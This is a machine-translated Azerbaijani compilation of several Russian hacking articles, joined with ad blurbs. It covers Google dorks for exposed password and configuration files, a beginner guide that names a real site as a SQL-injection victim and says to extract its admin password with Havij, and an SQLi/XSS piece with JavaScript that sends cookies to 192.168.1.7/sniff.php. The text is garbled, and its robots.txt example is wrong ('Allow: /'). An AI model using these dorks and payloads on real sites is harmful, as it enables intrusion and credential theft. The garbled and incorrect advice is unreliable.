Kali Linux-da SQL inyeksiyalarının axtarışı və istismarı üçün çoxfunksiyalı alət olan jSQL Injection-dan istifadə üçün təlimatlar. Gizli "kitab stendi" tapmaq üçün Google-un az tanınan xüsusiyyətlərindən istifadə edin

Google ilə hacking

Aleksandr Antipov

Google axtarış sistemi (www.google.com) çoxlu axtarış variantları təqdim edir. Bütün bu xüsusiyyətlər İnternetdə yeni istifadəçi üçün əvəzolunmaz axtarış vasitəsidir və eyni zamanda pis niyyətli insanların, o cümlədən təkcə hakerlərin deyil, həm də kompüterdən kənar cinayətkarların əlində daha güclü işğal və məhvetmə silahıdır. hətta terrorçular.
(1 həftədə 9475 baxış)


Denis Barankov
denisNOSPAMixi.ru

Diqqət: Bu məqalə fəaliyyət üçün bələdçi deyil. Bu məqalə sizin üçün, WEB server administratorları üçün yazılmışdır ki, siz təhlükəsiz olduğunuza dair yalan hissini itirəsiniz və nəhayət, məlumat əldə etməyin bu üsulunun məkrliliyini başa düşəsiniz və saytınızı qorumaq vəzifəsini götürəsiniz.

Giriş

Məsələn, mən 0,14 saniyəyə 1670 səhifə tapdım!

2. Başqa sətir daxil edin, məsələn:

inurl:"auth_user_file.txt"

bir az az, lakin bu, pulsuz yükləmə və parol təxmin etmək üçün artıq kifayətdir (eyni John The Ripper-dən istifadə etməklə). Aşağıda daha bir neçə misal verəcəyəm.

Beləliklə, Google axtarış sisteminin əksər İnternet saytlarına daxil olduğunu və onlarda olan məlumatları önbelleğe aldığını başa düşməlisiniz. Bu keşlənmiş məlumat sizə birbaşa sayta qoşulmadan, yalnız Google daxilində saxlanılan məlumatlara dərindən baxmaqla sayt və saytın məzmunu haqqında məlumat əldə etməyə imkan verir. Üstəlik, saytdakı məlumat artıq mövcud deyilsə, keşdəki məlumat hələ də qorunub saxlanıla bilər. Bu üsul üçün sizə lazım olan tək şey bəzi Google açar sözlərini bilməkdir. Bu texnika Google Hacking adlanır.

Google Hacking haqqında məlumat ilk dəfə Bugtruck poçt siyahısında 3 il əvvəl ortaya çıxdı. 2001-ci ildə bu mövzu bir fransız tələbə tərəfindən qaldırıldı. Bu məktubun linki http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Bu cür sorğuların ilk nümunələrini təqdim edir:

1) /admin indeksi
2) /parol indeksi
3) /poçt indeksi
4) / +banques +filetype:xls indeksi (fransa üçün...)
5) / +passwd indeksi
6) / password.txt indeksi

Bu mövzu internetin ingilis dilində oxuyan hissəsində çox yaxınlarda dalğalandı: Conni Lonqun 7 may 2004-cü ildə dərc olunmuş məqaləsindən sonra. Google Hacking haqqında daha ətraflı öyrənmək üçün sizə bu müəllifin http://johnny.ihackstuff.com saytına daxil olmağı məsləhət görürəm. Bu yazıda mən sadəcə sizi bu günə qədər çatdırmaq istəyirəm.

Bundan kim istifadə edə bilər:
- Jurnalistlər, casuslar və başqalarının işinə burnunu soxmağı sevən bütün insanlar bundan ittihamedici dəlil axtarmaq üçün istifadə edə bilərlər.
- Hakerlər hack üçün uyğun hədəflər axtarırlar.

Google necə işləyir.

Söhbətə davam etmək üçün icazə verin, Google sorğularında istifadə olunan bəzi açar sözləri sizə xatırlatım.

+ işarəsindən istifadə edərək axtarın

Google əhəmiyyətsiz hesab etdiyi sözləri axtarışlardan istisna edir. Məsələn, ingilis dilində sual sözləri, ön sözlər və məqalələr: məsələn, are, of, where. Rus dilində, Google bütün sözləri vacib hesab edir. Əgər söz axtarışdan çıxarılıbsa, Google bu barədə yazır. Google-un bu sözləri olan səhifələri axtarmağa başlaması üçün sözdən əvvəl boşluq qoymadan + işarəsi əlavə etməlisiniz. Misal üçün:

as + əsas

İşarəni istifadə edərək axtarın –

Əgər Google müəyyən bir mövzu ilə bağlı səhifələri xaric etməli olduğu çoxlu sayda səhifə tapırsa, onda siz Google-u yalnız müəyyən sözləri olmayan səhifələri axtarmağa məcbur edə bilərsiniz. Bunun üçün bu sözləri hər birinin qarşısında işarə qoyaraq - sözdən əvvəl boşluq qoymadan qeyd etməlisiniz. Misal üçün:

balıqçılıq - araq

~ istifadə edərək axtarın

Siz təkcə göstərilən sözü deyil, həm də onun sinonimlərini axtarmaq istəyə bilərsiniz. Bunun üçün sözdən əvvəl ~ işarəsi qoyun.

Qoşa dırnaq işarələrindən istifadə edərək dəqiq ifadənin tapılması

Google sorğu sətirində yazdığınız sözlərin bütün təkrarları üçün hər səhifədə axtarış aparır və bütün göstərilən sözlər səhifədə eyni vaxtda olduğu müddətcə sözlərin nisbi mövqeyinə əhəmiyyət vermir (bu, standart hərəkət). Dəqiq ifadəni tapmaq üçün onu dırnaq içərisində qoymaq lazımdır. Misal üçün:

"kitab"

Göstərilən sözlərdən ən azı birinə sahib olmaq üçün məntiqi əməliyyatı açıq şəkildə göstərməlisiniz: OR. Misal üçün:

kitab təhlükəsizliyi və ya qorunması

Bundan əlavə, hər hansı bir sözü göstərmək üçün axtarış çubuğunda * işarəsindən istifadə edə bilərsiniz və. hər hansı bir xarakteri təmsil etmək.

Əlavə operatorlardan istifadə edərək sözlərin axtarışı

Axtarış sətirində aşağıdakı formatda göstərilən axtarış operatorları var:

operator: axtarış_termin

Yoğun bağırsağın yanında boşluqlara ehtiyac yoxdur. İki nöqtədən sonra boşluq qoysanız, səhv mesajı görəcəksiniz və ondan əvvəl Google onları normal axtarış sətri kimi istifadə edəcək.
Əlavə axtarış operatorlarının qrupları var: dillər - nəticəni hansı dildə görmək istədiyinizi göstərin, tarix - son üç, altı və ya 12 ay ərzində nəticələri məhdudlaşdırın, baş verənlər - sənəddə harada axtarmaq lazım olduğunu göstərin sətir: hər yerdə, başlıqda, URL-də, domenlərdə - göstərilən saytda axtarış edin və ya əksinə, onu axtarışdan çıxarın - göstərilən məlumat növünü ehtiva edən saytları bloklayır və onları axtarış nəticələri səhifələrindən çıxarır;
Eyni zamanda, bəzi operatorlar əlavə parametr tələb etmir, məsələn, “cache:www.google.com” sorğusu tam hüquqlu axtarış sətri kimi adlandırıla bilər və bəzi açar sözlər, əksinə, axtarış tələb edir. söz, məsələn, “site:www.google.com help”. Mövzumuza uyğun olaraq aşağıdakı operatorlara nəzər salaq:

Operator

Təsvir

Əlavə parametr tələb edir?

yalnız search_term-də göstərilən saytda axtarış edin

yalnız search_term növü olan sənədlərdə axtarın

başlıqda axtarış_terminini ehtiva edən səhifələri tapın

başlıqda bütün axtarış_termin sözlərindən ibarət səhifələri tapın

ünvanlarında search_term sözünü ehtiva edən səhifələri tapın

ünvanında bütün axtarış_termin sözlərindən ibarət səhifələri tapın

Sayt: operator axtarışı yalnız göstərilən saytla məhdudlaşdırır və siz yalnız domen adını deyil, həm də IP ünvanını təyin edə bilərsiniz. Məsələn, daxil edin:

fayl növü operatoru: Axtarışı müəyyən bir fayl növü ilə məhdudlaşdırır. Misal üçün:

Məqalənin dərc edildiyi tarixdən etibarən Google 13 müxtəlif fayl formatında axtarış edə bilər:

  • Adobe Portativ Sənəd Formatı (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (sənəd)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (yazmaq)
  • Zəngin mətn formatı (rtf)
  • Şok dalğası Flaş (swf)
  • Mətn (ans, txt)

Link operatoru: Göstərilən səhifəyə işarə edən bütün səhifələri göstərir.
İnternetdə neçə yerin sizin haqqınızda bildiyini görmək yəqin ki, həmişə maraqlıdır. Gəlin cəhd edək:

Keş operatoru: Google-un həmin səhifəyə sonuncu dəfə daxil olduğu kimi Google-un keşində olan saytın versiyasını göstərir. Tez-tez dəyişən saytı götürək və baxaq:

intitle operatoru: Səhifənin başlığında müəyyən bir sözü axtarır. Allintitle: operator bir genişləndirmədir - o, səhifənin başlığında göstərilən bütün çoxlu sözləri axtarır. Müqayisə edin:

başlıq: Marsa uçuş
intitle:uçuş başlığı:intitle:mars
allintitle: Marsa uçuş

inurl operatoru: Google-un URL-də göstərilən sətri ehtiva edən bütün səhifələri göstərməsinə səbəb olur. allinurl operatoru: URL-də bütün sözləri axtarır. Misal üçün:

allinurl:acid acid_stat_alerts.php

Bu əmr xüsusilə SNORT-u olmayanlar üçün faydalıdır - ən azı onlar onun real sistemdə necə işlədiyini görə bilərlər.

Google istifadə edərək Hacking üsulları

Beləliklə, biz müəyyən etdik ki, yuxarıda göstərilən operatorların və açar sözlərin birləşməsindən istifadə etməklə hər kəs lazımi məlumatları toplaya və zəiflikləri axtara bilər. Bu üsullara tez-tez Google Hacking deyilir.

Sayt xəritəsi

Google-un saytda tapdığı bütün bağlantıları sadalamaq üçün sayt: operatorundan istifadə edə bilərsiniz. Tipik olaraq, skriptlər tərəfindən dinamik şəkildə yaradılan səhifələr parametrlərdən istifadə edilərək indeksləşdirilmir, buna görə də bəzi saytlar ISAPI filtrlərindən istifadə edir ki, keçidlər /article.asp?num=10&dst=5 şəklində deyil, tire /article/abc/num/ şəklində olsun. 10/ dst/5. Bu, saytın ümumiyyətlə axtarış motorları tərəfindən indeksləşdirilməsi üçün edilir.

Gəlin cəhd edək:

sayt: www.whitehouse.gov whitehouse

Google bir vebsaytdakı hər səhifənin ağ ev sözünü ehtiva etdiyini düşünür. Bütün səhifələri əldə etmək üçün istifadə etdiyimiz budur.
Sadələşdirilmiş versiya da var:

sayt: whitehouse.gov

Ən yaxşısı isə odur ki, whitehouse.gov-dan olan yoldaşlar bizim onların saytının strukturuna baxdığımızı və hətta Google-un yüklədiyi keşlənmiş səhifələrə baxdığımızı belə bilmirdilər. Bu, saytların strukturunu öyrənmək və hələlik aşkarlanmayan məzmuna baxmaq üçün istifadə edilə bilər.

Kataloqlardakı faylların siyahısına baxın

WEB serverləri adi HTML səhifələri əvəzinə server kataloqlarının siyahılarını göstərə bilər. Bu, adətən istifadəçilərin xüsusi faylları seçib yükləmələrini təmin etmək üçün edilir. Bununla belə, bir çox hallarda administratorların kataloqun məzmununu göstərmək niyyəti yoxdur. Bu, səhv server konfiqurasiyası və ya kataloqda əsas səhifənin olmaması səbəbindən baş verir. Nəticədə haker kataloqda maraqlı nəsə tapmaq və ondan öz məqsədləri üçün istifadə etmək şansı qazanır. Bütün belə səhifələri tapmaq üçün onların hamısında aşağıdakı sözlərin olduğunu qeyd etmək kifayətdir: index of. Lakin index of sözləri təkcə belə səhifələri ehtiva etmədiyi üçün biz sorğunu dəqiqləşdirməli və səhifənin özündə olan açar sözləri nəzərə almalıyıq, ona görə də sorğular:

intitle:ana qovluğun indeksi
başlıq:ad ölçüsü indeksi

Kataloq siyahılarının əksəriyyəti qəsdən olduğundan, ilk dəfə yersiz siyahıları tapmaqda çətinlik çəkə bilərsiniz. Ancaq ən azı aşağıda təsvir olunduğu kimi WEB server versiyasını müəyyən etmək üçün siyahılardan istifadə edə bilərsiniz.

WEB server versiyasının əldə edilməsi.

WEB server versiyasını bilmək hər hansı haker hücumuna başlamazdan əvvəl həmişə faydalıdır. Yenə Google sayəsində bu məlumatları serverə qoşulmadan əldə edə bilərsiniz. Kataloq siyahısına diqqətlə baxsanız, orada WEB serverinin adının və onun versiyasının göstərildiyini görə bilərsiniz.

Apache1.3.29 - trf296.free.fr Port 80-də ProXad Server

Təcrübəli idarəçi bu məlumatı dəyişə bilər, lakin, bir qayda olaraq, doğrudur. Beləliklə, bu məlumatı əldə etmək üçün sorğu göndərmək kifayətdir:

başlıq:index.of server.at

Müəyyən bir server üçün məlumat əldə etmək üçün sorğunu aydınlaşdırırıq:

intitle:index.of server.at site:ibm.com

Və ya əksinə, biz serverin xüsusi versiyasını işlədən serverləri axtarırıq:

intitle:index.of Apache/2.0.40 Server at

Bu texnika bir haker tərəfindən qurbanı tapmaq üçün istifadə edilə bilər. Məsələn, onun WEB serverinin müəyyən versiyası üçün istismarı varsa, o zaman onu tapa və mövcud istismarı sınaya bilər.

Siz həmçinin WEB serverinin ən son versiyasını quraşdırarkən defolt olaraq quraşdırılmış səhifələrə baxaraq server versiyasını əldə edə bilərsiniz. Məsələn, Apache 1.2.6 test səhifəsinə baxmaq üçün sadəcə yazın

intitle:Apache üçün Test.Page.işlədi!

Üstəlik, bəzi əməliyyat sistemləri quraşdırma zamanı WEB serverini dərhal quraşdırır və işə salır. Ancaq bəzi istifadəçilərin bundan xəbəri belə yoxdur. Təbii ki, kiminsə standart səhifəni silmədiyini görsəniz, kompüterin ümumiyyətlə heç bir fərdiləşdirməyə məruz qalmadığını və hücuma həssas olduğunu güman etmək məntiqlidir.

IIS 5.0 səhifələrini axtarmağa çalışın

allintitle:Windows 2000 İnternet Xidmətlərinə xoş gəlmisiniz

IIS vəziyyətində, yalnız server versiyasını deyil, həm də Windows versiyasını və Xidmət Paketini müəyyən edə bilərsiniz.

WEB server versiyasını müəyyən etməyin başqa bir yolu, standart olaraq saytda quraşdırıla bilən təlimatlar (kömək səhifələri) və nümunələri axtarmaqdır. Hakerlər sayta imtiyazlı giriş əldə etmək üçün bu komponentlərdən istifadə etməyin bir neçə yolunu tapıblar. Buna görə istehsal yerində bu komponentləri çıxarmaq lazımdır. Qeyd etmək olmaz ki, bu komponentlərin mövcudluğu serverin növü və onun versiyası haqqında məlumat verə bilər. Məsələn, apache təlimatını tapaq:

inurl: manual apache direktiv modulları

Google-dan CGI skaneri kimi istifadə.

CGI skaneri və ya WEB skaneri qurbanın serverində həssas skriptləri və proqramları axtarmaq üçün köməkçi proqramdır. Bu yardım proqramları nə axtarmaq lazım olduğunu bilməlidir, bunun üçün onların həssas faylların tam siyahısı var, məsələn:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Bu faylların hər birini Google-dan istifadə edərək, əlavə olaraq axtarış çubuğunda fayl adı ilə index of və ya inurl sözlərindən istifadə etməklə tapa bilərik: həssas skriptləri olan saytları tapa bilərik, məsələn:

allinurl:/random_banner/index.cgi

Əlavə biliklərdən istifadə edərək haker skriptin zəifliyindən istifadə edə bilər və bu boşluqdan skripti serverdə saxlanılan istənilən faylı yaymağa məcbur etmək üçün istifadə edə bilər. Məsələn, parol faylı.

Özünüzü Google sındırmalarından necə qorumalısınız. 1. WEB serverində vacib məlumatları yerləşdirməyin.

Məlumatı müvəqqəti yerləşdirmiş olsanız belə, siz onu unuda bilərsiniz və ya kimsə onu silməzdən əvvəl bu məlumatları tapıb götürməyə vaxt tapacaq. Bunu etmə. Məlumatları oğurluqdan qoruyan bir çox başqa yol var.

2. Saytınızı yoxlayın.

Saytınızı araşdırmaq üçün təsvir olunan üsullardan istifadə edin. http://johnny.ihackstuff.com saytında görünən yeni üsullar üçün vaxtaşırı saytınızı yoxlayın. Unutmayın ki, hərəkətlərinizi avtomatlaşdırmaq istəyirsinizsə, Google-dan xüsusi icazə almalısınız. Diqqətlə oxusanız http://www.google.com/terms_of_service.html, onda siz ifadəni görəcəksiniz: Siz Google-dan əvvəlcədən icazə almadan hər hansı bir növ avtomatlaşdırılmış sorğuları Google sisteminə göndərə bilməzsiniz.

3. Saytınızı və ya onun bir hissəsini indeksləşdirmək üçün Google-a ehtiyacınız olmaya bilər.

Google sizə saytınıza linki və ya onun bir hissəsini verilənlər bazasından silməyə, həmçinin səhifələri keşdən silməyə imkan verir. Bundan əlavə, saytınızdakı şəkillərin axtarışını qadağan edə bilərsiniz, səhifələrin qısa fraqmentlərinin axtarış nəticələrində göstərilməsini qadağan edə bilərsiniz http://www.google.com/remove.html. Bunun üçün siz həqiqətən bu saytın sahibi olduğunuzu təsdiq etməli və ya səhifəyə teqlər daxil etməlisiniz və ya

4. robots.txt istifadə edin

Məlumdur ki, axtarış sistemləri saytın kökündə yerləşən robots.txt faylına baxır və Disallow sözü ilə qeyd olunan hissələri indeksləmir. Saytın bir hissəsinin indeksləşdirilməsinin qarşısını almaq üçün bundan istifadə edə bilərsiniz. Məsələn, bütün saytın indeksləşdirilməsinin qarşısını almaq üçün iki sətirdən ibarət robots.txt faylı yaradın:

İstifadəçi-agent: *
İcazə verin: /

Başqa nə olur

Həyat sizə bal kimi görünməməsi üçün nəhayət deyim ki, yuxarıda göstərilən üsullardan istifadə edərək skriptlərdə və WEB serverlərində boşluqlar axtaran insanları izləyən saytlar var. Belə bir səhifənin nümunəsi

Ərizə.

Bir az şirin. Özünüz üçün aşağıdakılardan bəzilərini sınayın:

1. #mysql dump filetype:sql - mySQL verilənlər bazası zibillərini axtarın
2. Host Zəifliyi Xülasə Hesabatı - sizə digər insanların hansı zəiflikləri tapdığını göstərəcək
3. phpMyAdmin inurl:main.php üzərində işləyir - bu, nəzarəti phpmyadmin paneli vasitəsilə bağlamağa məcbur edəcək
4. məxfi paylanma üçün deyil
5. Sorğu Təfərrüatları Nəzarət Ağacı Server Dəyişənləri
6. Uşaq rejimində işləmək
7. Bu hesabat WebLog tərəfindən hazırlanmışdır
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – bəlkə kiməsə firewall konfiqurasiya faylları lazımdır? :)
10. başlıq:indeks.of finances.xls – hmm....
11. başlıq: dbconvert.exe söhbətlərinin indeksi – icq söhbət jurnalları
12.intext:Tobias Oetiker trafik təhlili
13. intitle: Webalizer tərəfindən yaradılan üçün İstifadə Statistikası
14. başlıq: qabaqcıl veb statistikasının statistikası
15. başlıq: ws_ftp.ini indeksi – ws ftp konfiqurasiyası
16. inurl:ipsec.secrets paylaşılan sirləri saxlayır - gizli açar - yaxşı tapmaq
17. inurl:main.php phpMyAdmin-ə xoş gəlmisiniz
18. inurl:server-info Apache Server Məlumatı
19. sayt:edu admin qiymətləri
20. ORA-00921: SQL əmrinin gözlənilməz sonu – yolların alınması
21. başlıq:trillian.ini indeksi
22. başlıq: pwd.db indeksi
23.intitle:insanlar.indeksi.lst
24. başlıq: master.passwd indeksi
25.inurl:passlist.txt
26. başlıq: .mysql_history indeksi
27. başlıq:intekst indeksi:globals.inc
28. başlıq:administratorların indeksi.pwd
29. başlıq:İndex.of etc kölgə
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:fayl tipini yerinə yetirin:ini

  • "Google-u sındırmaq"
  • Təlim mərkəzi "Informzashita" http://www.itsecurity.ru - informasiya təhlükəsizliyi təlimi sahəsində aparıcı ixtisaslaşmış mərkəz (Moskva Təhsil Komitəsinin 015470 saylı Lisenziyası, Dövlət akkreditasiyası No 004251). Rusiya və MDB ölkələrində İnternet Təhlükəsizlik Sistemləri və Clearswift üzrə yeganə səlahiyyətli təlim mərkəzi. Microsoft səlahiyyətli təlim mərkəzi (Təhlükəsizlik ixtisası). Təlim proqramları Rusiya Dövlət Texniki Komissiyası, FSB (FAPSI) ilə razılaşdırılır. Hazırlıq sertifikatları və ixtisasartırma üzrə dövlət sənədləri.

    SoftKey alıcılar, tərtibatçılar, dilerlər və filial tərəfdaşları üçün unikal xidmətdir. Bundan əlavə, bu, Rusiya, Ukrayna, Qazaxıstanda ən yaxşı onlayn proqram mağazalarından biridir, müştərilərə geniş çeşiddə məhsullar, bir çox ödəniş üsulları, operativ (çox vaxt ani) sifarişlərin işlənməsi, şəxsi bölmədə sifariş prosesinin izlənməsi, müxtəlif mağazadan və istehsalçılardan endirimlər BY.

    Beləliklə, indi sizə heç bir xüsusi bilik olmadan bir şeyi necə sındıracağınızı söyləyəcəyəm. Dərhal deyim ki, bundan az fayda var, amma yenə də.
    Əvvəlcə saytların özlərini tapmalısınız. Bunu etmək üçün google.com saytına daxil olun və dorks axtarın

    Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:elan et .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

    burada kiçik bir siyahı var. Özünüzdən istifadə edə bilərsiniz. Beləliklə, saytı tapdıq. Məsələn http://www.vestitambov.ru/
    Sonra bu proqramı yükləyin

    **Gizli Məzmun: Bu gizli məzmunu görmək üçün yazılarınızın sayı 3 və ya daha çox olmalıdır.**

    OK düyməsini basın. Sonra qurbanın yerini daxil edirik.
    Start düyməsini sıxırıq. Sonra nəticələri gözləyirik.
    Beləliklə, proqram SQL zəifliyini tapdı.

    Sonra, Havij yükləyin, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= alınan linki ora yapışdırın. Havij-dən necə istifadə edəcəyimi və onu haradan yükləməyinizi izah etməyəcəyəm; Hamısı. Sizə lazım olan məlumatları - administrator parolunu aldınız, sonra bu sizin təsəvvürünüzdən asılıdır.

    P.S. Bu mənim ilk cəhdimdir ki, nəsə yazacam. Səhv bir şey varsa üzr istəyirik

    İnformasiya təhlükəsizliyi haqqında bir az danışmaq qərarına gəldim. Məqalə təcrübəsiz proqramçılar və Frontend inkişafı ilə yeni məşğul olmağa başlayanlar üçün faydalı olacaq. Problem nədir?

    Bir çox təcrübəsiz tərtibatçı kod yazmaqla o qədər məşğul olur ki, işlərinin təhlükəsizliyini tamamilə unudurlar. Ən əsası isə SQL və XXS sorğuları kimi zəiflikləri unudurlar. Onlar həmçinin inzibati panelləri üçün asan parollar tapırlar və kobud gücə məruz qalırlar. Bu hücumlar nədir və onlardan necə qaçmaq olar?

    SQL inyeksiyası

    SQL inyeksiyası verilənlər bazasına ən çox yayılmış hücum növüdür və bu, konkret DBMS üçün SQL sorğusu zamanı həyata keçirilir. Bir çox insan və hətta iri şirkətlər belə hücumlardan əziyyət çəkir. Səbəb verilənlər bazası və daha dəqiq desək, SQL sorğularını yazarkən tərtibatçı xətasıdır.

    SQL injection hücumu SQL sorğularında istifadə edilən giriş məlumatlarının düzgün işlənməməsi səbəbindən mümkündür. Əgər hakerin hücumu uğurlu olarsa, siz təkcə verilənlər bazalarının məzmununu deyil, həm də parolları və administrativ panel jurnallarını itirmək riski daşıyırsınız. Və bu məlumat saytı tamamilə ələ keçirmək və ya ona geri dönməz düzəlişlər etmək üçün kifayət edəcəkdir.

    Hücum PHP, ASP, Perl və digər dillərdə yazılmış skriptlərdə uğurla təkrarlana bilər. Bu cür hücumların müvəffəqiyyəti daha çox hansı DBMS-dən istifadə olunduğundan və skriptin özünün necə həyata keçirilməsindən asılıdır. Dünyada SQL inyeksiyaları üçün çox həssas saytlar var. Bunu yoxlamaq asandır. Sadəcə olaraq "doks" daxil edin - bunlar həssas saytların axtarışı üçün xüsusi sorğulardır. Onlardan bəzilərini təqdim edirik:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Onlardan necə istifadə etmək olar? Sadəcə onları Google və ya Yandex axtarış sisteminə daxil edin. Axtarış sistemi sizə yalnız həssas sayt deyil, həm də bu zəiflik haqqında səhifə verəcəkdir. Ancaq biz bununla dayanmayacağıq və səhifənin həqiqətən həssas olduğuna əmin olacağıq. Bunun üçün “id=1” dəyərindən sonra tək “‘ sitatını qoymaq kifayətdir. Bu kimi bir şey:

    • inurl:games.php?id=1’

    Və sayt bizə SQL sorğusu ilə bağlı xəta verəcək. Hakerimizə bundan sonra nə lazımdır?

    Və sonra ona səhv səhifəsinə bu link lazımdır. Sonra zəiflik üzərində iş əksər hallarda bu hissə üçün utilitləri olan "Kali linux" paylanmasında baş verir: inyeksiya kodunu təqdim etmək və lazımi əməliyyatları yerinə yetirmək. Bu necə olacaq, sizə deyə bilmərəm. Ancaq internetdə bu barədə məlumat tapa bilərsiniz.

    XSS hücumu

    Bu cür hücum kuki fayllarına həyata keçirilir. İstifadəçilər də öz növbəsində onları xilas etməyi sevirlər. Niyə də yox? Onlar olmasaydı biz nə edərdik? Axı, kukilər sayəsində Vk.com və ya Mail.ru üçün parolu yüz dəfə daxil etmək məcburiyyətində deyilik. Və onlardan imtina edənlər azdır. Ancaq İnternetdə tez-tez hakerlər üçün bir qayda görünür: rahatlıq əmsalı etibarsızlıq əmsalı ilə birbaşa mütənasibdir.

    XSS hücumunu həyata keçirmək üçün hakerimiz JavaScript biliklərinə ehtiyac duyur. İlk baxışdan dil çox sadə və zərərsizdir, çünki onun kompüter resurslarına çıxışı yoxdur. Haker yalnız brauzerdə JavaScript ilə işləyə bilər, lakin bu kifayətdir. Axı, əsas odur ki, kodu veb səhifəyə daxil edin.

    Hücum prosesi haqqında ətraflı danışmayacağam. Bunun necə baş verdiyinin yalnız əsaslarını və mənasını sizə danışacağam.

    Haker bəzi foruma və ya qonaq kitabına JS kodu əlavə edə bilər:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Skriptlər bizi kodun icra olunacağı yoluxmuş səhifəyə yönləndirəcək: istər sniffer, istər bir növ saxlama, istərsə də hansısa şəkildə kukilərimizi keşdən oğurlayan istismar.

    Niyə JavaScript? Çünki JavaScript veb sorğuları idarə etməkdə əladır və kukilərə girişi var. Amma skriptimiz bizi hansısa sayta aparsa, istifadəçi bunu asanlıqla fərq edər. Burada haker daha hiyləgər bir variantdan istifadə edir - o, sadəcə olaraq şəklin içinə kodu daxil edir.

    Img=yeni Şəkil();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Biz sadəcə olaraq bir şəkil yaradırıq və skriptimizi ona ünvan kimi təyin edirik.

    Bütün bunlardan özünüzü necə qorumalısınız? Çox sadədir - şübhəli keçidlərə klikləməyin.

    DoS və DDos hücumları

